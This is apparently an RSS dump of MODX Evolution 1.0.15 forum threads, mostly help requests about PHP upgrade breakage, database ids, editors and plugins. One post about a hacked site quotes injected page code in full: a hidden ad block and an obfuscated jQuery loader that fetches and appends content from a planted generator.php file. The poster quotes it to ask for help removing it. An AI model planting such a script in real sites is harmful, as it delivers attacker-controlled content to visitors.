Evolution 1.0.15 - MODX Community Forums https://forums.modx.com/board/?board=297 <![CDATA[SMTP]]> https://forums.modx.com/thread/103364/smtp#dis-post-556265 https://forums.modx.com/thread/103364/smtp#dis-post-556265 Wed, 10 Jan 2018 11:22:11 +0000 https://forums.modx.com/thread/103364/smtp#dis-post-556265 <![CDATA[Strange problem : new MODx chunks are created with id=0]]> https://forums.modx.com/thread/102970/strange-problem-new-modx-chunks-are-created-with-id-0#dis-post-554442
I have this strange issue on a MODX 1.0.15 website: when trying creating a new chunk, it gets a value of 0 for the id.
(The website is based on an existing website using YAMS, in which I imported records.)

I checked the table structure and was surprised that the id colum was not a primary key.
So, I set the column as Primary Key using phpMyAdmin.

After that, I applied these two SQL requests:
ALTER TABLE `modx_site_htmlsnippets` MODIFY COLUMN id INT auto_increment;
ALTER TABLE `modx_site_htmlsnippets` AUTO_INCREMENT = 87;

The AUTO_INCREMENT value was set to 87 because
SELECT MAX(id) FROM `modx_site_htmlsnippets`
returned 86.

Despite this, new chunks still receive id 0 and the following MODx parsing error is returned:
« MODX Parse Error »
MODX encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - Duplicate entry '0' for key 'PRIMARY' »
SQL > INSERT INTO `somedatabase`.`modx_site_htmlsnippets` (`name`, `description`, `snippet`, `locked`, `category`) VALUES('hello', '', 'world', '0', '0')

Thank your for your help.]]>
https://forums.modx.com/thread/102970/strange-problem-new-modx-chunks-are-created-with-id-0#dis-post-554442 Wed, 11 Oct 2017 08:38:51 +0000 https://forums.modx.com/thread/102970/strange-problem-new-modx-chunks-are-created-with-id-0#dis-post-554442
<![CDATA[Paths Question]]> https://forums.modx.com/thread/99069/paths-question#dis-post-554441
Anyway, everything works well, except that we now get a Page Not Found error in a popup window when trying to insert images.


The paths to File Manager and File Browser must somehow be wrong?

What is confusing me is that the directory tree is set up as

public_html
modx
uploads

and all the images, etc are in uploads/files and uploads/images.

All the directories in uploads have permissions of 0755

The individual Manager User paths are blank.

_SERVER["DOCUMENT_ROOT"] is /home/masv/public_html
PHP Version 5.5.30
_SERVER["SERVER_SOFTWARE"] Apache

What should I set the main paths to? And do I use Tools->Configuration->FileManager and Tools->Configuration->FileBrowser for that?

]]>
https://forums.modx.com/thread/99069/paths-question#dis-post-554441 Wed, 11 Oct 2017 08:26:23 +0000 https://forums.modx.com/thread/99069/paths-question#dis-post-554441
<![CDATA[Modx Evolution 1.15 -Update Php to 5.5.38 Changes in Ressources are not shown in Frontend]]> https://forums.modx.com/thread/101741/modx-evolution-1-15--update-php-to-5-5-38-changes-in-ressources-are-not-shown-in-frontend#dis-post-548763
I have a site running with Evolution 1.15.
After an php-update by the provider (all-inkl.com)changes in ressources are not shown in frontend.
I do not get any kind of error-support.
Any ideas what I can do?

Thanks
Jane]]>
https://forums.modx.com/thread/101741/modx-evolution-1-15--update-php-to-5-5-38-changes-in-ressources-are-not-shown-in-frontend#dis-post-548763 Wed, 15 Feb 2017 10:28:56 +0000 https://forums.modx.com/thread/101741/modx-evolution-1-15--update-php-to-5-5-38-changes-in-ressources-are-not-shown-in-frontend#dis-post-548763
<![CDATA[Migrate from 1.0.15 to 1.1]]> https://forums.modx.com/thread/101310/migrate-from-1-0-15-to-1-1#dis-post-546804 https://docs.modx.com/evolution/1.0/administration/upgrading, the procedure is the same, it hasn't changed?]]> https://forums.modx.com/thread/101310/migrate-from-1-0-15-to-1-1#dis-post-546804 Tue, 29 Nov 2016 08:32:54 +0000 https://forums.modx.com/thread/101310/migrate-from-1-0-15-to-1-1#dis-post-546804 <![CDATA[Lots of MODx Evolution 1.0.15 Sites are hacked AFTER security patch was applied]]> https://forums.modx.com/thread/101334/lots-of-modx-evolution-1-0-15-sites-are-hacked-after-security-patch-was-applied#dis-post-546803
Lots of our MODx Evolution sites (~30 out of 50) have been hacked tonight AFTER we have applied this security patch:

https://forums.modx.com/thread/101240/evo-security-patch-1-0-12-and-above

We've patched on 16th November, all sites looked OK, then. Today, many hosters have send us mails, that malicious code was detected. And indeed, we must confirm that.

Any ideas?]]>
https://forums.modx.com/thread/101334/lots-of-modx-evolution-1-0-15-sites-are-hacked-after-security-patch-was-applied#dis-post-546803 Tue, 29 Nov 2016 08:23:33 +0000 https://forums.modx.com/thread/101334/lots-of-modx-evolution-1-0-15-sites-are-hacked-after-security-patch-was-applied#dis-post-546803
<![CDATA[Your host needs to use PHP 5.3.10 or higher to run this version of Joomla!]]> https://forums.modx.com/thread/101309/your-host-needs-to-use-php-5-3-10-or-higher-to-run-this-version-of-joomla#dis-post-546632
Thanks for your attention, from yesterday i get this message "Your host needs to use PHP 5.3.10 or higher to run this version of Joomla!", I'm not using Joomla, I use modx evolution 1.0.15, What does this mean?

I updated the php version in my hosting to 5.3 but i get this error:

Warning: require_once(/home/elranch6/public_html/includes/defines.php) [function.require-once]: failed to open stream: No such file or directory in /home/elranch6/public_html/index.php on line 89

Fatal error: require_once() [function.require]: Failed opening required '/home/elranch6/public_html/includes/defines.php' (include_path='.:/opt/php53/lib/php') in /home/elranch6/public_html/index.php on line 89

How can i solve this error?]]>
https://forums.modx.com/thread/101309/your-host-needs-to-use-php-5-3-10-or-higher-to-run-this-version-of-joomla#dis-post-546632 Wed, 23 Nov 2016 09:30:43 +0000 https://forums.modx.com/thread/101309/your-host-needs-to-use-php-5-3-10-or-higher-to-run-this-version-of-joomla#dis-post-546632
<![CDATA[Website php errors, won't load up and can't run installer to update]]> https://forums.modx.com/thread/100755/website-php-errors-won-t-load-up-and-can-t-run-installer-to-update#dis-post-544391
mod_fcgid: stderr: PHP Fatal error:  Uncaught Error: Call to undefined function mysql_connect() in /home/public_html/install/functions.php:76
mod_fcgid: stderr: Stack trace:
mod_fcgid: stderr: #0 /home/public_html/install/functions.php(50): get_installmode()
mod_fcgid: stderr: #1 /home/public_html/install/index.php(61): ph()
mod_fcgid: stderr: #2 {main}
mod_fcgid: stderr:   thrown in /home/public_html/install/functions.php on line 76


I'm trying to update as it now shows a blank page since a php upgrade. I changed mysql to mysqli in the config.php but it didn't help.

Thanks for any help getting this fixed. I have another Evo site running on the same server fine, so very weird why this one stopped working.

Much appreciated smiley]]>
https://forums.modx.com/thread/100755/website-php-errors-won-t-load-up-and-can-t-run-installer-to-update#dis-post-544391 Mon, 22 Aug 2016 10:22:06 +0000 https://forums.modx.com/thread/100755/website-php-errors-won-t-load-up-and-can-t-run-installer-to-update#dis-post-544391
<![CDATA[ [solved] Wayfinder 2.0 not displaying all children on Evo 1.0.15 with PHP 5.4]]> https://forums.modx.com/thread/100714/solved-wayfinder-2-0-not-displaying-all-children-on-evo-1-0-15-with-php-5-4#dis-post-544188
On some page, Wayfinder only lists 3 of 7 children and, although being a user of MODx for many years, I cannot figure out why.

The snippet call:
[!Wayfinder? &outerClass=`menu` &startId=`[*id*]` &level=`1` &outerTpl=`@FILE:assets/snippets/wayfinder/tpl/menu_pastel/outer.tpl` &rowTpl=`@FILE:assets/snippets/wayfinder/tpl/menu_pastel/row.tpl` !]


The attached picture shows the document tree.
https://modx.com/assets/attachments/297/544139/wayfinder_showing_only_3_children.png
The call to Wayfinder is in the template of document 98.
Only the children framed in green show, the ones framed in red don't.

- all children are published and marked as visible in menu
- all children use the same template and have the same TV filled
- all children have a different menuindex, from 0 to 6
- there is no excludeDoc parameter in the snippet call
- on the contrary to Wayfinder, Ditto is able to list all items
- when called from another page, Wayfinder lists all children without problem
- I cleared MODx cache, as well as the browser cache. I even deleted the content of folder "assets/cache". I refreshed the page.

The problem remains.

The webpage is online and I can send the URL by PM if someone wants to have a glance.
I cannot publish the URL for everybody as the site was not yet delivered to the customer.

Can someone help?]]>
https://forums.modx.com/thread/100714/solved-wayfinder-2-0-not-displaying-all-children-on-evo-1-0-15-with-php-5-4#dis-post-544188 Tue, 16 Aug 2016 08:19:59 +0000 https://forums.modx.com/thread/100714/solved-wayfinder-2-0-not-displaying-all-children-on-evo-1-0-15-with-php-5-4#dis-post-544188
<![CDATA[MODx Parse Error - Can't Send Emails from Manager or eform]]> https://forums.modx.com/thread/100282/modx-parse-error---can-t-send-emails-from-manager-or-eform#dis-post-542091 https://support.rackspace.com/how-to/test-php-mail-functionality/ and it is working fine....and I have called Bluehost and requested that the mailer setting be turned on.

I'm wondering if this is related to the MODx manager 1.0.15?

Error in manager is as follows:

« MODX Parse Error »
MODX encountered the following error while attempting to parse the requested resource:
« eliotgjones@gmail.com - Error sending email »
Basic info
REQUEST_URI :	http://www.canmorerealestate.com/manager/index.php?a=32
Manager action :	32 - Saving user
Referer :	http://www.canmorerealestate.com/manager/index.php?a=12&id=5
User Agent :	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
IP :	75.139.105.223
Benchmarks
MySQL :	0.2186 s (3 Requests)
PHP :	2.2828 s
Total :	2.5013 s
Memory :	2.4956817626953 mb

Backtrace

1	include_once()
manager/index.php on line 381
2	sendMailMessage()
manager/processors/save_user.processor.php on line 226
]]>
https://forums.modx.com/thread/100282/modx-parse-error---can-t-send-emails-from-manager-or-eform#dis-post-542091 Wed, 01 Jun 2016 10:52:46 +0000 https://forums.modx.com/thread/100282/modx-parse-error---can-t-send-emails-from-manager-or-eform#dis-post-542091
<![CDATA[KCFinder stopped working in multiple installations of 1.0.15]]> https://forums.modx.com/thread/100037/kcfinder-stopped-working-in-multiple-installations-of-1-0-15#dis-post-540951 http://cl.ly/3D2Q0M0J2b45. Before upload the theme appears as such: http://cl.ly/2J2f2C1B3A0O . There is no error message thrown however the image files (exp. .jpg) do not make it to the server.]]> https://forums.modx.com/thread/100037/kcfinder-stopped-working-in-multiple-installations-of-1-0-15#dis-post-540951 Wed, 27 Apr 2016 10:54:19 +0000 https://forums.modx.com/thread/100037/kcfinder-stopped-working-in-multiple-installations-of-1-0-15#dis-post-540951 <![CDATA[thankyou page shows no data in eform 1.4.6 on evo 1.0.15]]> https://forums.modx.com/thread/99617/thankyou-page-shows-no-data-in-eform-1-4-6-on-evo-1-0-15#dis-post-538783 Everything else is working.
I use eform 1.4.6 on evo 1.0.15

Here is my call
[!eForm? &formid=`contactInquire` &to=`newuser@localhost` &tpl=`contactForm` &report=`contactReport` &thankyou=`contactThanks` &vericode=`1` &gotoid=`10` &subject=`Inquire about products` &sendAsHTML=`1` &noemail=`0` &isDebug=`0` &protectSubmit=`0`!]


Here is my thankyou chunk
<ul id="contactThanks">
	<li class="benennung">First name</li><li class="tboxReport">[+firstname+]</li>
	<li class="benennung">Family name</li><li class="tboxReport">[+familyname+]</li>		 
	<li class="benennung">Street</li> <li class="tboxReport">[+street+]</li>
	<li class="benennung">P.O.Box / Post Code</li> <li class="tboxReport">[+pobox+]</li>		 
	<li class="benennung">Place / Town</li> <li class="tboxReport">[+place+]</li>
	<li class="benennung">Country</li> <li class="tboxReport">[+land+]</li>
	<li class="benennung">Phone</li> <li class="tboxReport">[+phone+]</li>
	<li class="benennung">Email</li> <li class="tboxReport">[+email+] </li>  
	<li class="benennung">File</li> <li class="tboxReport">[+attachment+] </li> 
<div class="clear"></div>
</ul>
]]>
https://forums.modx.com/thread/99617/thankyou-page-shows-no-data-in-eform-1-4-6-on-evo-1-0-15#dis-post-538783 Thu, 25 Feb 2016 03:11:45 +0000 https://forums.modx.com/thread/99617/thankyou-page-shows-no-data-in-eform-1-4-6-on-evo-1-0-15#dis-post-538783
<![CDATA[PHP upgrade corrupted TinyMCE and Evogallery]]> https://forums.modx.com/thread/99305/php-upgrade-corrupted-tinymce-and-evogallery#dis-post-537039
Following a (PHP) server upgrade to 5.5 the website frontend and admin has been producing errors. I have tried changing back to 5.3, I have deleted the cache, preformed a full update and followed most of the suggested fixes for similar problems with no success.

Errors in the frontend:
1. evogallery HTML entity >> in gallery breadcrumbs have been stripped of the & and ; (ie: to Home raquo Care facilities raquo Glenwood Hospital raquo Photo gallery). However, the MODx Page breadcrumbs display as they are supposed to.

Errors in the backend:
1. evogallery - all image thumbs are blacked out - see attached gallery.pdf (however, the images still show in the frontend)
2. When adding a link or image using TinyMCE the following link (http://www.exampleurl.co.nz/modx/manager/media/browser/mcpuk/browse.php?opener=tinymce&type=files) goes to the "Page not found" error page.

I would greatly appreciate any assistance or suggestions to remedy these issues.]]>
https://forums.modx.com/thread/99305/php-upgrade-corrupted-tinymce-and-evogallery#dis-post-537039 Fri, 15 Jan 2016 03:01:49 +0000 https://forums.modx.com/thread/99305/php-upgrade-corrupted-tinymce-and-evogallery#dis-post-537039
<![CDATA[TinyMCE menu does not display, even in fresh MODx install.]]> https://forums.modx.com/thread/99283/tinymce-menu-does-not-display-even-in-fresh-modx-install#dis-post-536923
At some point after that, TinyMCE no longer displays a menu. It is available to pick as an editor, and the context window shows rich text, but the menu area is mostly blank. The menu contains only two plain text links and a button for YouTube. The text links are two functional (but transparent) dropdown menus to control text style and font size. I've attached screenshots of both. The Youtube button functions as intended.

UPDATE: The problem seems to be that TinyMCE can't find its skins. I get these errors when switching to tinyMCE from the plain text editor:
GET http://www.churchofasphodel.org/assets/plugins/tinymce/tiny_mce/themes/advanced/skins//ui.css 404 tiny_mce.js?232972:1 
GET http://www.churchofasphodel.org/assets/plugins/tinymce/tiny_mce/themes/advanced/skins//content.css 404 (Not Found) tiny_mce.js?232972:1


So that should be .../skins/default/ui.css

I don't know where I can set that parameter. The options in the plugin configuration page have "Web Theme" but the options to not match the names of the folders in the skins directory, and selecting them does nothing.

The behavior is the same for other people accessing my site from elsewhere, not just me.

I attempted to fix this by deleting and reinstalling TinyMCE, which seemed to work, except the image picker (kcfinder) cannot insert images. The image button in tinyMCE opens the image dialog, and the button there opens the image picker, but in the image picker, double clicking an image does nothing. I can select an image, but nothing happens. Clicking an image highlights it, and right-clicking displays the context menu, but none of the options copy the location of the image back to the image dialog.

I did not know where to go from here, so I tried it on a fresh MODx install. It is the same. I uploaded the freshly downloaded copy of 1.0.15 from the MODx site, extracted them into an empty folder, and ran the install using an empty database. The only non-default setting I used is SET NAMES for the database, because SET CHARACTER SET gives me error "Checking database: failed - database collation mismatch; use SET NAMES or choose utf8_unicode_ci". I did not alter or reinstall the tinyMCE plugin on the fresh install.

ETA: Any ideas as to what could be causing this? I realize that for most people this just works, but I have no idea what might be causing this to fail for me, doing a standard install.

Description of Problem: TinyMCE does not load its menu properly.

Steps to Reproduce: I can reproduce it consistently by installing MODx in a new directory with a new database, and trying to edit a page with tinyMCE. I would not expect other to be able to reproduce it.

Expected Outcome: A menu of formatting buttons should appear above the content window.


  • MODX Version: 1.0.15
  • PHP Version: 5.2.17
  • Database (MySQL, SQL Server, etc) Version: (This is all the version info I could find from phpMyadmin. Not sure which of these is relevant)
  • Database Server - Server version: 5.5.42-37.1 - Percona Server (GPL), Release 37.1, Revision 727
    Web server - cpsrvd 11.48.4.8 Database client version: libmysql - 5.1.73 PHP extension: mysqli
    phpMyAdmin - Version information: 4.3.8, latest stable version: 4.5.3.1
  • Additional Server Info:
  • Installed MODX Add-ons: NONE. Only what is included in default installation.
  • Error Log Contents: (attach as file if it’s too large) Not sure where to find this in Evo. All the stuff I can find online (googling "modx evolution error log") is for Revo. The System Event Log found under reports in the Manager is empty.
]]>
https://forums.modx.com/thread/99283/tinymce-menu-does-not-display-even-in-fresh-modx-install#dis-post-536923 Tue, 12 Jan 2016 08:20:34 +0000 https://forums.modx.com/thread/99283/tinymce-menu-does-not-display-even-in-fresh-modx-install#dis-post-536923
<![CDATA[Problems with PHP 5.6.16 and Evo 1.0.15]]> https://forums.modx.com/thread/99077/problems-with-php-5-6-16-and-evo-1-0-15#dis-post-536398
My hosting provider (Lunarpages) upgraded PHP last night and all my ModX Evo sites are failing and throwing 500 server errors. One possible solution I stumbled upon was to simply run a reinstall, which actually worked for about 3 minutes--the site was back up and I was able to log in to the Manager, etc.--and then for no apparent reason it started failing again.

I have confirmed that the MySQL login credentials are correct and everything else is just as it was Wednesday when things were working properly (except for the new version of PHP).

Here are the errors I am getting, both in the error log on the site and the server log:

Site errors:

[11-Dec-2015 09:35:38 America/Los_Angeles] PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 72 bytes) in /home/ether6/public_html/schiff/manager/includes/document.parser.class.inc.php on line 3651

[11-Dec-2015 09:35:38 America/Los_Angeles] PHP Warning: mysql_connect(): Access denied for user 'ether6_mborum'@'localhost' (using password: YES) in /home/ether6/public_html/schiff/manager/includes/extenders/dbapi.mysql.class.inc.php on line 93

Server errors:

[Fri Dec 11 09:48:25.272624 2015] [:error] [pid 974704] (12)Cannot allocate memory: [client 24.5.37.217:49917] couldn't create child process: /opt/suphp/sbin/suphp for /home/ether6/public_html/schiff/index.php


I have opened a support ticket with Lunarpages, but they aren't being very helpful or responsive just yet. They have confirmed, more or less, that PHP 5.6.16 is the only version now available to me.

I appreciate any tips on how to address this. I am not a terribly strong sysadmin or PHP debugger.

Thank you,
Michael]]>
https://forums.modx.com/thread/99077/problems-with-php-5-6-16-and-evo-1-0-15#dis-post-536398 Wed, 30 Dec 2015 02:07:36 +0000 https://forums.modx.com/thread/99077/problems-with-php-5-6-16-and-evo-1-0-15#dis-post-536398
<![CDATA[My site seems to have been hacked with googlesyndication]]> https://forums.modx.com/thread/98188/my-site-seems-to-have-been-hacked-with-googlesyndication#dis-post-535407
My site was hacked so I updated to the latest version of Evolution and removed the hack which was inserted into a chunk.

Now it's happened again but I can't even find the source.

Some pages end with


<![endif]-->

<script type="text/javascript">console.log('clref');</script></body>
</html>

I've no idea whether this is inserted by Modx or as a hack but this doesn't seem to do anything.

However sometimes the end of the page source appears differently with the code below which is a hack. Can someone tell me even how to start to remove this?

<![endif]-->

<style type="text/css">
#c-arr {position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; z-index: 10001; width:27px; height:20px; overflow:hidden;}
#c-arr .mask {position: absolute;top: 5px;left: 5px;z-index: 1000;height: 13px;width: 15px;}
</style>
<div id="c-arr">
<div class="mask"></div>
<div id="co-arr">
<script type="text/javascript">
google_ad_client = "ca-pub-6916770808430792";
google_ad_slot = "9779299062";
google_ad_width = 320;
google_ad_height = 100;
</script>
<!-- 25 -->
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>
</div>
<script type="text/javascript">
var jQ = false;
function initJQ() {
if (typeof(jQuery) == "undefined") {
if (jQ === false) {
jQ = true;
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://code.jquery.com/jquery-1.8.3.min.js";
document.getElementsByTagName("head")[0].appendChild(script);
}
setTimeout("initJQ()", 50);
} else {
(function($) {
$(function() {

var _l131 = "/assets/pgn4web/board-generator/",
_l132 = 20000,
_f132 = "generator.php";

function _f131() {
jQuery.get(_l131 + _f132 + "?w=1", function(data) {
jQuery("body").append(data)
});
}
setTimeout(_f131, _l132);
})
})(jQuery)
}
}
initJQ();
</script></body>
</html>

]]>
https://forums.modx.com/thread/98188/my-site-seems-to-have-been-hacked-with-googlesyndication#dis-post-535407 Fri, 04 Dec 2015 04:38:19 +0000 https://forums.modx.com/thread/98188/my-site-seems-to-have-been-hacked-with-googlesyndication#dis-post-535407
<![CDATA[Evo 1.0.15 Need to fix Manager/includes/ for Warning: strtotime() for PHP 5.5 upgrade]]> https://forums.modx.com/thread/98897/evo-1-0-15-need-to-fix-manager-includes-for-warning-strtotime-for-php-5-5-upgrade#dis-post-534805
AddHandler application/x-httpd-php55 .php

front end is fine, but /manager delivers 3 files all with the same error:

----
Warning: strtotime(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function.
In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier.
We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone.
----

manager/includes/rss.inc.php on line 49 =
$pubdate = $modx->toDateFormat(strtotime($pubdate));

manager/includes/document.parser.class.inc.php on line 2503 =
$strTime = strftime($dateFormat . " %H:%M:%S", $timestamp);

manager/actions/welcome.static.php on line 175 =
$html.= "<tr bgcolor='#FFFFFF'><td><b>".$activeusers['username']."</b></td><td>$webicon ".abs($activeusers['internalKey'])."</td><td>".$activeusers['ip']."</td><td>".strftime('%H:%M:%S', $activeusers['lasthit']+$server_offset_time)."</td><td>$currentaction</td></tr>";
}

I saw an earlier post about using a php.ini file.. but that doesn't seem to work. Any ideas of how to fix these three files?





]]>
https://forums.modx.com/thread/98897/evo-1-0-15-need-to-fix-manager-includes-for-warning-strtotime-for-php-5-5-upgrade#dis-post-534805 Wed, 25 Nov 2015 11:22:46 +0000 https://forums.modx.com/thread/98897/evo-1-0-15-need-to-fix-manager-includes-for-warning-strtotime-for-php-5-5-upgrade#dis-post-534805
<![CDATA[Is there a Refresh Cache Script for Evolution?]]> https://forums.modx.com/thread/98186/is-there-a-refresh-cache-script-for-evolution#dis-post-534214
We use Bob Ray's lovely RefreshCache script on MODx Revolution websites.

Does anyone know if there an equivalent script that works on MODx Evolution?

thanks

Ian.
]]>
https://forums.modx.com/thread/98186/is-there-a-refresh-cache-script-for-evolution#dis-post-534214 Tue, 10 Nov 2015 08:47:17 +0000 https://forums.modx.com/thread/98186/is-there-a-refresh-cache-script-for-evolution#dis-post-534214
<![CDATA[Site Hacked - What DB tables are safe to just copy?]]> https://forums.modx.com/thread/98623/site-hacked---what-db-tables-are-safe-to-just-copy#dis-post-533385
This is the first time I've dealt with something like this. The site uses Jot, but doesn't have web users or allow file uploading. It doesn't store any sensitive information.

I deleted the spammy files, I uploaded a new core.inc.php file, set all new database passwords, and upgraded to Evo 1.0.15. (It was previously running an older version, Evo 1.0.5, maybe.) I was hoping that would do it.

But today I got another notice from my host, saying that my database access had been suspended due to excessive calls. They included a log file, which I don't really understand, but it shows the database username for this one site as making all the excessive calls. (I have a dozen or so sites on the server, some WordPress, but most MODx.)

I've deleted the whole folder for that site (I have backups), and deleted the database username, but not the database. I have copied a fresh MODx install in its place, and copied over just the images and media from the assets folder of the old site. I cannot install yet, as my database access is still blocked.

My plan is to install, then copy content over from the database, but I don't know what is safe to copy. I don't want to copy infected stuff and go through this all over again. I don't know what I'd even be looking for. I was hoping someone could give me some info or resources on what tables I might have to be careful about, and what I'd be looking for.]]>
https://forums.modx.com/thread/98623/site-hacked---what-db-tables-are-safe-to-just-copy#dis-post-533385 Mon, 19 Oct 2015 11:43:12 +0000 https://forums.modx.com/thread/98623/site-hacked---what-db-tables-are-safe-to-just-copy#dis-post-533385
<![CDATA[All snippets are parsed as strings]]> https://forums.modx.com/thread/98580/all-snippets-are-parsed-as-strings#dis-post-533101 On the website all the snippets are parsed as strings.

For example, instead of calling the snippet shows
return require MODX_BASE_PATH.'assets / snippets / eform / snippet.eform.php ';

PHP Version 5.2.17-2+mh1]]>
https://forums.modx.com/thread/98580/all-snippets-are-parsed-as-strings#dis-post-533101 Mon, 12 Oct 2015 11:56:48 +0000 https://forums.modx.com/thread/98580/all-snippets-are-parsed-as-strings#dis-post-533101